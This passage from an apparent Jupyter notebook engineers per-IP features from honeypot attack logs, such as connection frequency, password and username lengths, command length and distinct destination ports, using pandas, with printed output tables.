19526,98.217.250.11,6.465478,0,0,1,88.940892,0,0,0,1,0,0
19527,98.6.58.60,6.465478,42,11,4,88.940892,0,0,0,1,0,0
19528,99.188.30.66,6.465478,44,24,3,88.940892,0,0,0,0,1,0
19529,99.98.99.67,6.465478,0,0,1,88.940892,0,0,0,1,0,0

In [262]:
head = data.groupby('src_ip').count()
head.head()
head.reset_index(inplace = True)
val = head[['src_ip', 'app']]
val.head()

        src_ip  app
0  1.1.155.160    4
1   1.1.174.78    4
2   1.1.176.59    1
3    1.1.202.4    4
4    1.1.210.2    4

In [264]:
current = pd.merge(current, val, how = 'inner', on = 'src_ip')

In [265]:
current.rename(columns={'app':'daily_frequency'}, inplace=True)

In [266]:
current

,src_ip,length_username,mean_time_difference,sd_time_difference,sensor_number,length_command,amun,conpot,cowrie,dionaea,glastopf,rdphoney,daily_frequency
0,1.100.22.156,5.000000,0,0,2,88.940892,0,0,1,0,0,0,2
1,1.52.2.217,6.000000,15,37,7,88.940892,0,0,1,0,0,0,7
2,1.55.71.60,5.000000,0,0,15,20.461538,0,0,1,0,0,0,15
3,100.33.94.246,6.000000,0,0,4,88.940892,0,0,1,0,0,0,4
4,100.36.75.127,6.000000,0,0,2,88.940892,0,0,1,0,0,0,2
5,101.236.29.126,2.000000,0,0,2,88.940892,0,0,1,0,0,0,2
6,101.26.35.254,5.200000,53,53,62,88.940892,0,0,0,1,0,0,62
7,101.71.37.21,6.000000,0,0,2,88.940892,0,0,1,0,0,0,2
8,102.165.37.59,23.555556,11,49,48,88.940892,0,0,1,0,0,0,48
9,103.207.244.92,5.000000,0,0,2,88.940892,0,0,1,0,0,0,2
10,103.21.148.16,3.000000,45,11,6,88.940892,0,0,1,0,0,0,6
11,103.23.100.217,4.000000,0,0,2,88.940892,0,0,1,0,0,0,2
12,103.237.147.69,4.000000,0,0,2,88.940892,0,0,1,0,0,0,2
13,103.249.205.78,2.000000,0,0,2,88.940892,0,0,1,0,0,0,2
14,103.42.254.96,6.000000,19,14,7,88.940892,0,0,1,0,0,0,7
15,103.45.109.95,2.000000,0,0,2,88.940892,0,0,1,0,0,0,2
16,103.53.166.148,2.000000,0,0,2,88.940892,0,0,1,0,0,0,2
17,103.69.218.147,5.500000,19,33,4,88.940892,0,0,1,0,0,0,4
18,103.78.183.41,5.000000,0,0,15,20.461538,0,0,1,0,0,0,15
19,103.79.90.72,3.000000,0,0,2,88.940892,0,0,1,0,0,0,2
20,103.80.55.34,5.000000,0,0,2,88.940892,0,0,1,0,0,0,2
21,103.99.113.89,2.000000,0,0,2,88.940892,0,0,1,0,0,0,2
22,104.131.93.33,9.000000,0,0,2,88.940892,0,0,1,0,0,0,2
23,104.168.215.199,4.986842,35,43,137,4.857143,0,0,1,0,0,0,137
24,104.196.16.112,5.000000,0,0,2,88.940892,0,0,1,0,0,0,2
25,104.236.246.127,6.000000,0,0,2,88.940892,0,0,1,0,0,0,2
26,104.236.28.167,2.000000,0,0,2,88.940892,0,0,1,0,0,0,2
27,104.238.116.19,7.000000,0,0,2,88.940892,0,0,1,0,0,0,2
28,104.243.44.230,21.251825,3,34,11502,28.663072,0,0,1,0,0,0,11502
29,104.248.135.32,6.040650,16,28,585,8.000000,0,0,1,0,0,0,585
...,...,...,...,...,...,...,...,...,...,...,...,...,...
17666,96.11.92.220,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2
17667,96.125.192.9,6.465478,0,0,1,88.940892,0,0,0,0,1,0,1
17668,96.233.79.179,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2
17669,96.244.71.124,6.465478,0,0,1,88.940892,0,0,1,0,0,0,1
17670,96.245.190.226,6.465478,46,4,4,88.940892,0,0,0,1,0,0,4
17671,96.245.198.6,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2
17672,96.30.101.87,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2
17673,96.30.70.153,6.465478,41,11,4,88.940892,0,0,0,1,0,0,4
17674,96.30.71.168,6.465478,31,11,5,88.940892,0,0,0,1,0,0,5
17675,96.30.94.26,6.465478,12,17,3,88.940892,0,0,0,1,0,0,3
17676,96.30.95.194,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2
17677,96.69.120.161,6.465478,10,0,10,88.940892,0,0,0,1,0,0,10
17678,96.70.41.109,6.465478,0,0,1,88.940892,0,0,1,0,0,0,1
17679,96.71.40.78,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1
17680,96.75.245.217,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2
17681,96.76.250.161,6.465478,15,53,23,88.940892,0,0,0,1,0,0,23
17682,96.9.154.23,6.465478,52,40,4,88.940892,0,0,0,1,0,0,4
17683,96.92.47.189,6.465478,10,0,10,88.940892,0,0,0,1,0,0,10
17684,97.78.232.134,6.465478,10,0,45,88.940892,0,0,0,1,0,0,45
17685,98.102.107.42,6.465478,41,11,4,88.940892,0,0,0,1,0,0,4
17686,98.113.35.10,6.465478,16,31,8,88.940892,0,0,0,1,0,0,8
17687,98.143.63.246,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1
17688,98.143.67.212,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1
17689,98.153.26.245,6.465478,57,6,5,88.940892,0,0,0,1,0,0,5
17690,98.172.135.115,6.465478,41,10,4,88.940892,0,0,0,1,0,0,4
17691,98.198.202.103,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1
17692,98.217.250.11,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1
17693,98.6.58.60,6.465478,42,11,4,88.940892,0,0,0,1,0,0,4
17694,99.188.30.66,6.465478,44,24,3,88.940892,0,0,0,0,1,0,3
17695,99.98.99.67,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1

In [269]:
new = data[['src_ip', 'ssh_password']]
new.head()

           src_ip ssh_password
0  198.199.89.115          NaN
1  198.199.89.115          NaN
2  198.199.89.115          NaN
3  198.199.89.115          NaN
4  198.199.89.115          NaN

In [293]:
new_data = data[['src_ip', 'ssh_password']]
new_data.head()
new_data.dropna(inplace = True)

/anaconda3/lib/python3.6/site-packages/ipykernel_launcher.py:3: SettingWithCopyWarning:
A value is trying to be set on a copy of a slice from a DataFrame

See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
  This is separate from the ipykernel package so we can avoid doing imports until

In [294]:
new_data['length_password'] = new_data['ssh_password'].apply(len)

/anaconda3/lib/python3.6/site-packages/ipykernel_launcher.py:1: SettingWithCopyWarning:
A value is trying to be set on a copy of a slice from a DataFrame.
Try using .loc[row_indexer,col_indexer] = value instead

See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
  """Entry point for launching an IPython kernel.

In [295]:
new_data.drop(['ssh_password'], axis = 1, inplace = True)

In [296]:
new_data.drop_duplicates(inplace= True)

/anaconda3/lib/python3.6/site-packages/ipykernel_launcher.py:1: SettingWithCopyWarning:
A value is trying to be set on a copy of a slice from a DataFrame

See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
  """Entry point for launching an IPython kernel.

In [297]:
new_data

                  src_ip  length_password
1974      198.199.89.115                6
1975      198.199.89.115                5
1976      198.199.89.115               23
1978      198.199.89.115               31
1979      198.199.89.115               15
1983      198.199.89.115               95
1985       209.97.184.49                6
1986       209.97.184.49                5
1987       209.97.184.49               23
1989       209.97.184.49               31
1990       209.97.184.49               15
1994       209.97.184.49               85
1996       68.183.18.206                6
1997       68.183.18.206                5
1998       68.183.18.206               23
2000       68.183.18.206               31
2001       68.183.18.206               15
2005       68.183.18.206               95
2143        141.98.81.81                5
2144        141.98.81.81                4
2145        141.98.81.81                7
7546       70.15.157.147               12
7547       70.15.157.147                6
7548       70.15.157.147                2
9757      185.244.25.107                6
9758      185.244.25.107                5
9759      185.244.25.107               23
9761      185.244.25.107               31
9762      185.244.25.107               15
9766      185.244.25.107               89
...                  ...              ...
1436111    84.193.247.68                7
1436254  156.212.213.200                4
1436255  156.212.213.200                6
1436256  156.212.213.200                2
1436636    103.45.109.95                2
1436730   142.93.177.246                8
1436787    42.225.221.18                6
1436789    42.225.221.18                2
1436856  138.197.111.250                8
1436907    42.225.221.18                5
1436937   187.20.134.136                6
1437092   212.98.190.248               17
1437547    212.237.9.156               19
1437599    212.237.9.156               23
1437926      27.50.24.83                7
1437934    189.232.76.11                7
1438211   134.175.42.162                6
1438265   159.65.148.241               11
1438916  206.189.137.176                5
1439301   41.221.168.168               11
1439487      74.63.232.2                4
1440784     108.44.249.5                6
1440971      74.63.232.2                9
1441096    148.70.63.163                3
1441324   200.69.250.253                6
1441535     90.35.232.54               11
1441536     90.35.232.54                6
1441537     90.35.232.54                2
1441817    31.196.187.69                6
1441818    31.196.187.69                2

[2724 rows x 2 columns]

In [302]:
current = pd.merge(current, new_data, how = 'outer', on = 'src_ip')
current['length_password'].fillna(value = current['length_password'].mean(), inplace = True)

In [306]:
current.drop(['length_password_x', 'length_password_y'], axis = 1, inplace = True)

In [311]:
current.drop_duplicates(inplace= True)
current.drop_duplicates('src_ip', inplace= True)
current

,src_ip,length_username,mean_time_difference,sd_time_difference,sensor_number,length_command,amun,conpot,cowrie,dionaea,glastopf,rdphoney,daily_frequency,length_password
0,1.100.22.156,5.000000,0,0,2,88.940892,0,0,1,0,0,0,2,8.000000
1,1.52.2.217,6.000000,15,37,7,88.940892,0,0,1,0,0,0,7,8.000000
28,1.55.71.60,5.000000,0,0,15,20.461538,0,0,1,0,0,0,15,10.506774
29,100.33.94.246,6.000000,0,0,4,88.940892,0,0,1,0,0,0,4,8.000000
56,100.36.75.127,6.000000,0,0,2,88.940892,0,0,1,0,0,0,2,6.000000
57,101.236.29.126,2.000000,0,0,2,88.940892,0,0,1,0,0,0,2,2.000000
58,101.26.35.254,5.200000,53,53,62,88.940892,0,0,0,1,0,0,62,4.000000
85,101.71.37.21,6.000000,0,0,2,88.940892,0,0,1,0,0,0,2,6.000000
86,102.165.37.59,23.555556,11,49,48,88.940892,0,0,1,0,0,0,48,6.000000
302,103.207.244.92,5.000000,0,0,2,88.940892,0,0,1,0,0,0,2,5.000000
303,103.21.148.16,3.000000,45,11,6,88.940892,0,0,1,0,0,0,6,5.000000
311,103.23.100.217,4.000000,0,0,2,88.940892,0,0,1,0,0,0,2,4.000000
312,103.237.147.69,4.000000,0,0,2,88.940892,0,0,1,0,0,0,2,6.000000
313,103.249.205.78,2.000000,0,0,2,88.940892,0,0,1,0,0,0,2,2.000000
314,103.42.254.96,6.000000,19,14,7,88.940892,0,0,1,0,0,0,7,6.000000
315,103.45.109.95,2.000000,0,0,2,88.940892,0,0,1,0,0,0,2,2.000000
316,103.53.166.148,2.000000,0,0,2,88.940892,0,0,1,0,0,0,2,2.000000
317,103.69.218.147,5.500000,19,33,4,88.940892,0,0,1,0,0,0,4,8.000000
325,103.78.183.41,5.000000,0,0,15,20.461538,0,0,1,0,0,0,15,5.000000
326,103.79.90.72,3.000000,0,0,2,88.940892,0,0,1,0,0,0,2,8.000000
327,103.80.55.34,5.000000,0,0,2,88.940892,0,0,1,0,0,0,2,5.000000
328,103.99.113.89,2.000000,0,0,2,88.940892,0,0,1,0,0,0,2,5.000000
329,104.131.93.33,9.000000,0,0,2,88.940892,0,0,1,0,0,0,2,9.000000
330,104.168.215.199,4.986842,35,43,137,4.857143,0,0,1,0,0,0,137,10.000000
1661,104.196.16.112,5.000000,0,0,2,88.940892,0,0,1,0,0,0,2,5.000000
1662,104.236.246.127,6.000000,0,0,2,88.940892,0,0,1,0,0,0,2,8.000000
1663,104.236.28.167,2.000000,0,0,2,88.940892,0,0,1,0,0,0,2,2.000000
1664,104.238.116.19,7.000000,0,0,2,88.940892,0,0,1,0,0,0,2,6.000000
1665,104.243.44.230,21.251825,3,34,11502,28.663072,0,0,1,0,0,0,11502,6.000000
3393,104.248.135.32,6.040650,16,28,585,8.000000,0,0,1,0,0,0,585,7.000000
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
191995,96.11.92.220,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2,10.506774
191996,96.125.192.9,6.465478,0,0,1,88.940892,0,0,0,0,1,0,1,10.506774
191997,96.233.79.179,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2,10.506774
191998,96.244.71.124,6.465478,0,0,1,88.940892,0,0,1,0,0,0,1,10.506774
191999,96.245.190.226,6.465478,46,4,4,88.940892,0,0,0,1,0,0,4,10.506774
192000,96.245.198.6,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2,10.506774
192001,96.30.101.87,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2,10.506774
192002,96.30.70.153,6.465478,41,11,4,88.940892,0,0,0,1,0,0,4,10.506774
192003,96.30.71.168,6.465478,31,11,5,88.940892,0,0,0,1,0,0,5,10.506774
192004,96.30.94.26,6.465478,12,17,3,88.940892,0,0,0,1,0,0,3,10.506774
192005,96.30.95.194,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2,10.506774
192006,96.69.120.161,6.465478,10,0,10,88.940892,0,0,0,1,0,0,10,10.506774
192007,96.70.41.109,6.465478,0,0,1,88.940892,0,0,1,0,0,0,1,10.506774
192008,96.71.40.78,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1,10.506774
192009,96.75.245.217,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2,10.506774
192010,96.76.250.161,6.465478,15,53,23,88.940892,0,0,0,1,0,0,23,10.506774
192011,96.9.154.23,6.465478,52,40,4,88.940892,0,0,0,1,0,0,4,10.506774
192012,96.92.47.189,6.465478,10,0,10,88.940892,0,0,0,1,0,0,10,10.506774
192013,97.78.232.134,6.465478,10,0,45,88.940892,0,0,0,1,0,0,45,10.506774
192014,98.102.107.42,6.465478,41,11,4,88.940892,0,0,0,1,0,0,4,10.506774
192015,98.113.35.10,6.465478,16,31,8,88.940892,0,0,0,1,0,0,8,10.506774
192016,98.143.63.246,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1,10.506774
192017,98.143.67.212,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1,10.506774
192018,98.153.26.245,6.465478,57,6,5,88.940892,0,0,0,1,0,0,5,10.506774
192019,98.172.135.115,6.465478,41,10,4,88.940892,0,0,0,1,0,0,4,10.506774
192020,98.198.202.103,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1,10.506774
192021,98.217.250.11,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1,10.506774
192022,98.6.58.60,6.465478,42,11,4,88.940892,0,0,0,1,0,0,4,10.506774
192023,99.188.30.66,6.465478,44,24,3,88.940892,0,0,0,0,1,0,3,10.506774
192024,99.98.99.67,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1,10.506774

In [327]:
dat_t = data.groupby('src_ip')['dest_port'].nunique()
new_dat_t = dat_t.reset_index()
new_dat_t

               src_ip  dest_port
0         1.1.155.160          1
1          1.1.174.78          1
2          1.1.176.59          1
3           1.1.202.4          1
4           1.1.210.2          1
5         1.1.218.253          1
6         1.1.238.231          2
7         1.10.137.15          1
8        1.10.193.152          2
9        1.10.199.196          2
10        1.10.255.90          1
11        1.100.134.2          1
12       1.100.22.156          1
13      1.109.145.112          1
14        1.109.23.38          1
15      1.119.140.226          1
16      1.119.150.180          2
17      1.129.110.113          1
18      1.136.109.185          1
19       1.158.42.147          1
20       1.160.202.78          2
21       1.160.209.47          1
22       1.160.237.26          1
23       1.160.75.193          2
24      1.161.174.194          1
25       1.161.184.77          1
26      1.161.213.222          1
27      1.161.240.208          1
28        1.161.94.44          1
29      1.162.171.118          1
...               ...        ...
17677   96.244.71.124          1
17678  96.245.190.226          1
17679    96.245.198.6          1
17680    96.30.101.87          1
17681    96.30.70.153          2
17682    96.30.71.168          2
17683     96.30.94.26          1
17684    96.30.95.194          1
17685    96.57.82.166          1
17686   96.69.120.161          1
17687    96.70.41.109          1
17688     96.71.40.78          1
17689   96.75.245.217          1
17690   96.76.166.105          2
17691   96.76.250.161          3
17692     96.9.154.23          2
17693    96.92.47.189          1
17694   97.78.232.134          1
17695   98.102.107.42          1
17696    98.113.35.10          2
17697   98.143.63.246          1
17698   98.143.67.212          1
17699   98.151.110.89          1
17700   98.153.26.245          1
17701  98.172.135.115          1
17702  98.198.202.103          1
17703   98.217.250.11          1
17704      98.6.58.60          1
17705    99.188.30.66          2
17706     99.98.99.67          1

[17707 rows x 2 columns]

In [332]:
current = pd.merge(new_dat_t, current, how = 'inner', on = 'src_ip')
c

,src_ip,dest_port,dest_port_x,dest_port_y,length_username,mean_time_difference,sd_time_difference,sensor_number,length_command,amun,conpot,cowrie,dionaea,glastopf,rdphoney,daily_frequency,length_password
0,1.1.155.160,1,1,1,6.465478,41,11,4,88.940892,0,0,0,1,0,0,4,10.506774
1,1.1.174.78,1,1,1,6.465478,41,10,4,88.940892,0,0,0,1,0,0,4,10.506774
2,1.1.176.59,1,1,1,6.465478,0,0,1,88.940892,0,0,1,0,0,0,1,10.506774
3,1.1.202.4,1,1,1,6.465478,41,11,4,88.940892,0,0,0,1,0,0,4,10.506774
4,1.1.210.2,1,1,1,6.465478,42,11,4,88.940892,0,0,0,1,0,0,4,10.506774
5,1.1.218.253,1,1,1,6.465478,56,44,3,88.940892,0,0,0,1,0,0,3,10.506774
6,1.1.238.231,2,2,2,6.465478,41,11,4,88.940892,0,0,0,1,0,0,4,10.506774
7,1.10.137.15,1,1,1,6.465478,0,0,1,88.940892,0,0,0,0,1,0,1,10.506774
8,1.10.193.152,2,2,2,6.465478,9,31,12,88.940892,0,0,0,1,0,0,12,10.506774
9,1.10.199.196,2,2,2,6.465478,31,54,5,88.940892,0,0,0,1,0,0,5,10.506774
10,1.10.255.90,1,1,1,6.465478,41,11,4,88.940892,0,0,0,1,0,0,4,10.506774
11,1.100.134.2,1,1,1,6.465478,0,0,1,88.940892,0,0,1,0,0,0,1,10.506774
12,1.100.22.156,1,1,1,5.000000,0,0,2,88.940892,0,0,1,0,0,0,2,8.000000
13,1.109.145.112,1,1,1,6.465478,0,0,1,88.940892,0,0,1,0,0,0,1,10.506774
14,1.109.23.38,1,1,1,6.465478,0,0,1,88.940892,0,0,1,0,0,0,1,10.506774
15,1.119.140.226,1,1,1,6.465478,0,0,5,88.940892,0,0,0,0,1,0,5,10.506774
16,1.119.150.180,2,2,2,6.465478,6,13,10,88.940892,1,0,0,0,0,0,10,10.506774
17,1.129.110.113,1,1,1,6.465478,42,12,4,88.940892,0,0,0,1,0,0,4,10.506774
18,1.136.109.185,1,1,1,6.465478,41,11,4,88.940892,0,0,0,1,0,0,4,10.506774
19,1.158.42.147,1,1,1,6.465478,0,0,1,88.940892,0,0,1,0,0,0,1,10.506774
20,1.160.202.78,2,2,2,6.465478,2,3,12,88.940892,0,0,0,1,0,0,12,10.506774
21,1.160.209.47,1,1,1,6.465478,58,8,8,88.940892,0,0,0,1,0,0,8,10.506774
22,1.160.237.26,1,1,1,6.465478,43,11,4,88.940892,0,0,0,1,0,0,4,10.506774
23,1.160.75.193,2,2,2,6.465478,22,30,3,88.940892,0,0,0,1,0,0,3,10.506774
24,1.161.174.194,1,1,1,6.465478,41,11,4,88.940892,0,0,0,1,0,0,4,10.506774
25,1.161.184.77,1,1,1,6.465478,42,11,4,88.940892,0,0,0,1,0,0,4,10.506774
26,1.161.213.222,1,1,1,6.465478,42,11,4,88.940892,0,0,0,1,0,0,4,10.506774
27,1.161.240.208,1,1,1,6.465478,44,11,4,88.940892,0,0,0,1,0,0,4,10.506774
28,1.161.94.44,1,1,1,6.465478,2,3,12,88.940892,0,0,0,1,0,0,12,10.506774
29,1.162.171.118,1,1,1,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2,10.506774
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
17666,96.244.71.124,1,1,1,6.465478,0,0,1,88.940892,0,0,1,0,0,0,1,10.506774
17667,96.245.190.226,1,1,1,6.465478,46,4,4,88.940892,0,0,0,1,0,0,4,10.506774
17668,96.245.198.6,1,1,1,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2,10.506774
17669,96.30.101.87,1,1,1,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2,10.506774
17670,96.30.70.153,2,2,2,6.465478,41,11,4,88.940892,0,0,0,1,0,0,4,10.506774
17671,96.30.71.168,2,2,2,6.465478,31,11,5,88.940892,0,0,0,1,0,0,5,10.506774
17672,96.30.94.26,1,1,1,6.465478,12,17,3,88.940892,0,0,0,1,0,0,3,10.506774
17673,96.30.95.194,1,1,1,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2,10.506774
17674,96.57.82.166,1,1,1,4.500000,35,55,4,88.940892,0,0,1,0,0,0,4,8.000000
17675,96.69.120.161,1,1,1,6.465478,10,0,10,88.940892,0,0,0,1,0,0,10,10.506774
17676,96.70.41.109,1,1,1,6.465478,0,0,1,88.940892,0,0,1,0,0,0,1,10.506774
17677,96.71.40.78,1,1,1,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1,10.506774
17678,96.75.245.217,1,1,1,6.465478,0,0,2,88.940892,0,0,0,1,0,0,2,10.506774
17679,96.76.166.105,2,2,2,5.000000,3,38,5,88.940892,0,0,1,0,0,0,5,4.000000
17680,96.76.250.161,3,3,3,6.465478,15,53,23,88.940892,0,0,0,1,0,0,23,10.506774
17681,96.9.154.23,2,2,2,6.465478,52,40,4,88.940892,0,0,0,1,0,0,4,10.506774
17682,96.92.47.189,1,1,1,6.465478,10,0,10,88.940892,0,0,0,1,0,0,10,10.506774
17683,97.78.232.134,1,1,1,6.465478,10,0,45,88.940892,0,0,0,1,0,0,45,10.506774
17684,98.102.107.42,1,1,1,6.465478,41,11,4,88.940892,0,0,0,1,0,0,4,10.506774
17685,98.113.35.10,2,2,2,6.465478,16,31,8,88.940892,0,0,0,1,0,0,8,10.506774
17686,98.143.63.246,1,1,1,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1,10.506774
17687,98.143.67.212,1,1,1,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1,10.506774
17688,98.151.110.89,1,1,1,4.000000,0,0,2,88.940892,0,0,1,0,0,0,2,4.000000
17689,98.153.26.245,1,1,1,6.465478,57,6,5,88.940892,0,0,0,1,0,0,5,10.506774
17690,98.172.135.115,1,1,1,6.465478,41,10,4,88.940892,0,0,0,1,0,0,4,10.506774
17691,98.198.202.103,1,1,1,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1,10.506774
17692,98.217.250.11,1,1,1,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1,10.506774
17693,98.6.58.60,1,1,1,6.465478,42,11,4,88.940892,0,0,0,1,0,0,4,10.506774
17694,99.188.30.66,2,2,2,6.465478,44,24,3,88.940892,0,0,0,0,1,0,3,10.506774
17695,99.98.99.67,1,1,1,6.465478,0,0,1,88.940892,0,0,0,1,0,0,1,10.506774

In [336]:
current['dest_port'].value_counts()

1     12866
2      4619
3        98
4        95
6         3
5         3
15        2
11        2
7         2
12        1
24        1
18        1
33        1
17        1
16        1
Name: dest_port, dtype: int64

In [337]:
current.rename(columns={'dest_port':'dest_port_number'}, inplace=True)

In [340]:
current['length_command'].value_counts()

88.940892     17397
20.461538        71
4.857143         54
632.000000       34
6.714286         31
7.142857         19
6.857143         14
8.000000          2
23.190476         2
23.000000         2
30.005155         1
5.052632          1
29.328125         1
27.341264         1
101.500000        1
26.990008         1
29.558559         1
15.600000         1
29.414118         1
71.328444         1
30.223952         1
6.677419          1
28.509158         1
30.336310         1
7.666667          1
54.523810         1
6.000000          1
29.009551         1
28.861818         1
29.807634         1
              ...
29.870968         1
71.531250         1
29.532787         1
30.068966         1
67.690127         1
29.757576         1
61.574953         1
30.778947         1
99.750000         1
63.331467         1
30.969367         1
29.098246         1
7.000000          1
6.818898          1
28.202532         1
7.285714          1
24.500000         1
27.789474         1
29.916463         1
30.320972         1
29.617174         1
30.695966         1
29.887574         1
29.284921         1
7.254545          1
4.967742          1
71.129850         1
28.333333         1
23.400000         1
28.930000         1
Name: length_command, Length: 80, dtype: int64

In [341]:
current['length_password'].value_counts()

10.506774    16939
6.000000       232
5.000000       100
8.000000        87
4.000000        77
7.000000        63
9.000000        41
3.000000        36
10.000000       30
2.000000        20
12.000000       15
11.000000       15
1.000000        10
14.000000        5
13.000000        5
19.000000        5
24.000000        4
23.000000        3
17.000000        2
15.000000        2
16.000000        2
22.000000        1
47.000000        1
21.000000        1
Name: length_password, dtype: int64

In [342]:
current['length_username'].value_counts()

6.465478     16936
5.000000       105
6.000000        88
2.000000        58
4.000000        55
7.000000        30
3.000000        24
8.000000        22
5.500000        21
5.333333        20
5.756098        20
9.000000        13
4.500000         9
5.666667         9
22.888889        9
4.666667         7
23.000000        6
6.333333         6
10.000000        6
6.500000         6
7.500000         5
22.555556        4
5.200000         3
1.000000         3
5.250000         3
5.888889         3
5.166667         3
5.400000         3
6.200000         3
5.583333         3
             ...
5.090909         1
4.800000         1
4.853659         1
6.074074         1
6.750000         1
5.347826         1
5.489796         1
6.040650         1
4.029249         1
5.570093         1
5.357143         1
5.487500         1
5.574074         1
5.750000         1
5.150000         1
23.111111        1
23.444444        1
5.113636         1
5.285714         1
22.111111        1
5.411765         1
5.066667         1
48.200000        1
5.521053         1
5.416667         1
5.909091         1
4.781250         1
4.414634         1
5.457627         1
5.050000         1
Name: length_username, Length: 216, dtype: int64